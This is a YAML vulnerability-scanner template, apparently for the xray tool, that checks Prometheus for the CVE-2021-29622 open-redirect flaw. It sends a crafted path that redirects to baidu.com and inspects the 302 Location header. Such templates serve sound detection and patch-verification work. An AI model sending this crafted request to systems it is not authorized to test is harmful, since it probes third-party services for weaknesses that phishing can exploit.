name: poc-yaml-prometheus-url-redirection-cve-2021-29622
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /new/newhttps:/baidu.com
            follow_redirects: false
        expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?"
expression: r0()
detail:
    author: fuzz7j(https://github.com/fuzz7j)
    links:
        - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
